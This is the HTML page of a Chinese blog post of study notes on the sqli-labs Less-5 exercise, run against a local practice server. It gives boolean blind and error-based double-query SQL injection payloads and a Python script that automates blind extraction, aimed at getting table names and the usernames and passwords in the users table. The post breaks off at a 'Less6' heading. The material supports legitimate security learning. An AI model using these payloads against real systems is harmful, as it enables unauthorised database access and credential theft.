<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.0.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">
  <link rel="alternate" href="/atom.xml" title="Gee" type="application/atom+xml">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">


<script id="hexo-configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '7.5.0',
    exturl: false,
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false},
    copycode: {"enable":false,"show_result":false,"style":null},
    back2top: {"enable":true,"sidebar":false,"scrollpercent":false},
    bookmark: {"enable":false,"color":"#222","save":"auto"},
    fancybox: false,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    algolia: {
      appID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    path: '',
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    translation: {
      copy_button: '复制',
      copy_success: '复制成功',
      copy_failure: '复制失败'
    },
    sidebarPadding: 40
  };
</script>

  <meta name="description" content="0x01  Less-5先输入id=1’ and 1=1报错了，输入id=1’ and ‘1’=’1,有回显，但是没有回显具体内容，所以猜测是字符型的布尔盲注。接下来就是猜库名猜测出库名第一个字母为s，然后用同样的方法，猜测出，第二个字母为e，然后以此类推，得到库名security1payload:?id=1&amp;apos; and substr(database(),x,1)=&amp;apos;xxx&amp;a">
<meta property="og:type" content="article">
<meta property="og:title" content="sql注入笔记2（sqli-labs）">
<meta property="og:url" content="http:&#x2F;&#x2F;yoursite.com&#x2F;2019&#x2F;11&#x2F;29&#x2F;sql%E6%B3%A8%E5%85%A5%E7%AC%94%E8%AE%B02&#x2F;index.html">
<meta property="og:site_name" content="Gee">
<meta property="og:description" content="0x01  Less-5先输入id=1’ and 1=1报错了，输入id=1’ and ‘1’=’1,有回显，但是没有回显具体内容，所以猜测是字符型的布尔盲注。接下来就是猜库名猜测出库名第一个字母为s，然后用同样的方法，猜测出，第二个字母为e，然后以此类推，得到库名security1payload:?id=1&amp;apos; and substr(database(),x,1)=&amp;apos;xxx&amp;a">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https:&#x2F;&#x2F;github.com&#x2F;gee617&#x2F;picture&#x2F;raw&#x2F;master&#x2F;%E6%8D%95%E8%8E%B723.JPG">
<meta property="og:image" content="https:&#x2F;&#x2F;github.com&#x2F;gee617&#x2F;picture&#x2F;raw&#x2F;master&#x2F;%E6%8D%95%E8%8E%B724.JPG">
<meta property="og:image" content="https:&#x2F;&#x2F;github.com&#x2F;gee617&#x2F;picture&#x2F;raw&#x2F;master&#x2F;%E6%8D%95%E8%8E%B725.JPG">
<meta property="og:image" content="https:&#x2F;&#x2F;github.com&#x2F;gee617&#x2F;picture&#x2F;raw&#x2F;master&#x2F;%E6%8D%95%E8%8E%B722.JPG">
<meta property="og:image" content="https:&#x2F;&#x2F;github.com&#x2F;gee617&#x2F;picture&#x2F;raw&#x2F;master&#x2F;%E6%8D%95%E8%8E%B726.JPG">
<meta property="og:image" content="https:&#x2F;&#x2F;github.com&#x2F;gee617&#x2F;picture&#x2F;raw&#x2F;master&#x2F;%E6%8D%95%E8%8E%B721.JPG">
<meta property="og:image" content="https:&#x2F;&#x2F;github.com&#x2F;gee617&#x2F;picture&#x2F;raw&#x2F;master&#x2F;%E6%8D%95%E8%8E%B727.JPG">
<meta property="og:image" content="https:&#x2F;&#x2F;github.com&#x2F;gee617&#x2F;picture&#x2F;raw&#x2F;master&#x2F;%E6%8D%95%E8%8E%B728.JPG">
<meta property="og:image" content="https:&#x2F;&#x2F;github.com&#x2F;gee617&#x2F;picture&#x2F;raw&#x2F;master&#x2F;%E6%8D%95%E8%8E%B729.JPG">
<meta property="og:image" content="https:&#x2F;&#x2F;github.com&#x2F;gee617&#x2F;picture&#x2F;raw&#x2F;master&#x2F;%E6%8D%95%E8%8E%B730.JPG">
<meta property="og:image" content="https:&#x2F;&#x2F;github.com&#x2F;gee617&#x2F;picture&#x2F;raw&#x2F;master&#x2F;%E6%8D%95%E8%8E%B731.JPG">
<meta property="og:updated_time" content="2019-12-03T13:56:29.953Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https:&#x2F;&#x2F;github.com&#x2F;gee617&#x2F;picture&#x2F;raw&#x2F;master&#x2F;%E6%8D%95%E8%8E%B723.JPG">

<link rel="canonical" href="http://yoursite.com/2019/11/29/sql%E6%B3%A8%E5%85%A5%E7%AC%94%E8%AE%B02/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true,
    isPage: false,
    isArchive: false
  };
</script>

  <title>sql注入笔记2（sqli-labs） | Gee</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Gee</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
  </div>

  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>

</nav>
  <div class="site-search">
    <div class="popup search-popup">
    <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocorrect="off" autocapitalize="none"
           placeholder="搜索..." spellcheck="false"
           type="text" id="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result"></div>

</div>
<div class="search-pop-overlay"></div>

  </div>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/11/29/sql%E6%B3%A8%E5%85%A5%E7%AC%94%E8%AE%B02/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="jiangtao zheng">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Gee">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          sql注入笔记2（sqli-labs）
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2019-11-29 17:54:45" itemprop="dateCreated datePublished" datetime="2019-11-29T17:54:45+08:00">2019-11-29</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2019-12-03 21:56:29" itemprop="dateModified" datetime="2019-12-03T21:56:29+08:00">2019-12-03</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/sql%E6%B3%A8%E5%85%A5/" itemprop="url" rel="index">
                    <span itemprop="name">sql注入</span>
                  </a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>0x01  Less-5</p><p>先输入id=1’ and 1=1报错了，输入id=1’ and ‘1’=’1,有回显，但是没有回显具体内容，所以猜测是字符型的布尔盲注。<br><img src="https://github.com/gee617/picture/raw/master/%E6%8D%95%E8%8E%B723.JPG" alt="picture"><br>接下来就是猜库名<br><img src="https://github.com/gee617/picture/raw/master/%E6%8D%95%E8%8E%B724.JPG" alt="picture"><br>猜测出库名第一个字母为s，然后用同样的方法，猜测出，第二个字母为e，然后以此类推，得到库名security</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload:?id=1&apos; and substr(database(),x,1)=&apos;xxx&apos;%23</span><br></pre></td></tr></table></figure><a id="more"></a>


<p>然后开始猜测表名，这个比较麻烦，首先猜有几个表<br><img src="https://github.com/gee617/picture/raw/master/%E6%8D%95%E8%8E%B725.JPG" alt="picture"><br>发现有四个表</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload:?id=1&apos; and (select count(table_name) from information_schema.tables where table_schema=database())=x%23</span><br></pre></td></tr></table></figure>
<p>然后开始猜测每个表的名字，我们关键是要找一张users的表，因为一般这张表里有用户名和密码<br><img src="https://github.com/gee617/picture/raw/master/%E6%8D%95%E8%8E%B722.JPG" alt="picture"><br>搞了半天，发现第四张表是users，然后要开始猜字段名，方法跟猜表名差不多,输入</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload:?id=1&apos; and substr((select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA = &apos;database()&apos; and TABLE_NAME = &apos;users&apos; limit x,1),x,1)=&apos;xxx&apos;%23</span><br></pre></td></tr></table></figure>
<p>，通过改变x的值来猜测各个列名，找到username和password两个列，最后开始报字段名id=1’  and substr((select group_concat(username/password) from security.users limit x,1),x,1)=’xxx’%23，但是这实在是太麻烦了<br>于是我去网上找了个布尔盲注的脚本来：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#! -*- encoding:utf-8 -*-</span></span><br><span class="line"><span class="comment">#select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA 猜库名</span></span><br><span class="line"><span class="comment">#select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA = 'xxx'猜表名</span></span><br><span class="line"><span class="comment">#select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA = 'xxx' and TABLE_NAME = 'xxx'猜列名</span></span><br><span class="line"><span class="comment">#select group_concat(password/username) from xxx.xxx猜字段名</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">dic=<span class="string">'0123456789abcdefghijklmnopqrstuvwxyz,'</span></span><br><span class="line">url=<span class="string">'http://localhost:8080/sqli-labs-master/Less-5/?id=1\' and '</span></span><br><span class="line">string=<span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">100</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> dic:</span><br><span class="line">        id=<span class="string">"substr((select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA = database() and TABLE_NAME = 'users' limit 0,1),&#123;0&#125;,1)=&#123;1&#125;--+"</span>.format(str(i),ascii(j))</span><br><span class="line">        <span class="comment">#print(id)</span></span><br><span class="line">        url_get=(url+id)</span><br><span class="line">        <span class="comment">#print(url_get)</span></span><br><span class="line">        r=requests.get(url_get)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">"You"</span> <span class="keyword">in</span> r.text:</span><br><span class="line">            string+=j</span><br><span class="line">            print(string)</span><br><span class="line">print(string)</span><br></pre></td></tr></table></figure>
<p>参考博客：<a href="https://uuzdaisuki.com/2018/04/22/python%E8%84%9A%E6%9C%AC%E5%AE%9E%E7%8E%B0%E8%87%AA%E5%8A%A8%E5%8C%96sql%E7%9B%B2%E6%B3%A8/" target="_blank" rel="noopener">https://uuzdaisuki.com/2018/04/22/python%E8%84%9A%E6%9C%AC%E5%AE%9E%E7%8E%B0%E8%87%AA%E5%8A%A8%E5%8C%96sql%E7%9B%B2%E6%B3%A8/</a><br>运行脚本，得到结果：<br><img src="https://github.com/gee617/picture/raw/master/%E6%8D%95%E8%8E%B726.JPG" alt="picture"><br><img src="https://github.com/gee617/picture/raw/master/%E6%8D%95%E8%8E%B721.JPG" alt="picture"><br>结果我看网上的wp发现，这道题好像不是考的不是布尔盲注，应该是报错注入！！关于什么是双注入查询，可以看看这篇文章:<a href="https://www.2cto.com/article/201303/192718.html" target="_blank" rel="noopener">https://www.2cto.com/article/201303/192718.html</a><br>简单来说就是count函数后面如果使用分组语句就会把查询的一部分以错误的形式显示出来，通过构造双查询，是一个查询结果报错，另一个查询结果就会出现在报错信息中，具体做法是，多一个聚合函数<br>count(*)<br>暴库payload：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1&apos;union select count(*),1, concat((select database()),floor(rand()*2)) as a from information_schema.tables group by a%23</span><br></pre></td></tr></table></figure>
<p>由于rand()函数的存在，它是随机产生一个大于0 小于1的数，所以不一定会产生报错，有一定的随机性，所以可以多试几次<br><img src="https://github.com/gee617/picture/raw/master/%E6%8D%95%E8%8E%B727.JPG" alt="picture"><br>爆表名payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1&apos; union select count(*),1, concat((select concat(table_name) from information_schema.tables where table_schema=database() limit x,1),floor(rand()*2)) as a from information_schema.tables group by a%23</span><br></pre></td></tr></table></figure>
<p><img src="https://github.com/gee617/picture/raw/master/%E6%8D%95%E8%8E%B728.JPG" alt="picture"><br>得到第四张表为users<br>爆破列名payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1&apos; union select count(*),1, concat((select column_name from information_schema.columns where table_name=&apos;users&apos; limit x,1),floor(rand()*2)) as a from information_schema.tables group by a%23</span><br></pre></td></tr></table></figure>
<p><img src="https://github.com/gee617/picture/raw/master/%E6%8D%95%E8%8E%B729.JPG" alt="picture"><br><img src="https://github.com/gee617/picture/raw/master/%E6%8D%95%E8%8E%B730.JPG" alt="picture"><br>得到三，四列为username和password<br>爆字段payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1&apos; union select count(*),1, concat((select concat_ws(&apos;[&apos;,password,username) from users limit x,1),floor(rand()*2)) as a from information_schema.tables group by a%23</span><br></pre></td></tr></table></figure>
<p><img src="https://github.com/gee617/picture/raw/master/%E6%8D%95%E8%8E%B731.JPG" alt="picture"></p>
<p>0X02-Less6</p>

    </div>

    
    
    

      <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-next post-nav-item">
                <a href="/2019/11/26/sql%E6%B3%A8%E5%85%A5%E7%AC%94%E8%AE%B0/" rel="next" title="sql注入笔记1（sqli-labs基础挑战，DVWA注入练习）">
                  <i class="fa fa-chevron-left"></i> sql注入笔记1（sqli-labs基础挑战，DVWA注入练习）
                </a>
            </div>

            <span class="post-nav-divider"></span>

            <div class="post-nav-prev post-nav-item">
                <a href="/2019/12/02/%E5%85%A5%E9%97%A8%E7%BA%A7%E9%9D%B6%E6%9C%BA%E5%AE%9E%E6%88%98%EF%BC%88Eric%EF%BC%89/" rel="prev" title="入门级靶机实战（Eric）">
                  入门级靶机实战（Eric） <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="site-author-image" itemprop="image" alt="jiangtao zheng"
    src="/images/avatar.gif">
  <p class="site-author-name" itemprop="name">jiangtao zheng</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">6</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
  </nav>
</div>
  <div class="feed-link motion-element">
    <a href="/atom.xml" rel="alternate">
      <i class="fa fa-rss"></i>RSS
    </a>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">jiangtao zheng</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v4.0.0
  </div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">主题 – <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> v7.5.0
  </div>
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="site-uv">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
    </span>
  
    <span class="site-pv">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
    </span>
    </div>
        












        
      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script>
<script src="/js/schemes/pisces.js"></script>
<script src="/js/next-boot.js"></script>



  




  <script src="/js/local-search.js"></script>













  

  

</body>
</html>
